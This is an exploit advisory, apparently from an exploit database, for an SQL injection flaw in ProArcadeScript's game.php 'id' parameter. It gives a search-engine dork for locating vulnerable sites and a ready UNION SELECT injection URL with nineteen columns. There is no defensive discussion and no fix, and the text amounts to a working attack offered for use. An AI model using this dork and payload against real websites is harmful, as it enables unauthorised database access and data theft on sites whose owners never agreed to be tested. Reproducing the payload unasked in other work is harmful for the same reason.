id: 10659
date: 01/10/2010
title: ProArcadeScript to Game (game) SQL Injection Vulnerability
author: Err0R
cves: 

==========================================================
ProArcadeScript to Game (game) SQL Injection Vulnerability
==========================================================

# Software Link: proarcadescript.com
# Version: N/A
 
+/=============================================\+
# [+] Title : ProArcadeScript to Game (game) SQL Injection Vulnerability
# [+] site s.p : proarcadescript.com
# [+] Author : Err0R
+\=============================================/+
 
===============================================
DorK : intext:'Powered by ProArcadeScript ' inurl:'game.php?id='
===============================================
Exploit : You Come the Inject !
Demo :
http://server/games/game.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
============================================



#  0day.today [2023-03-26]  #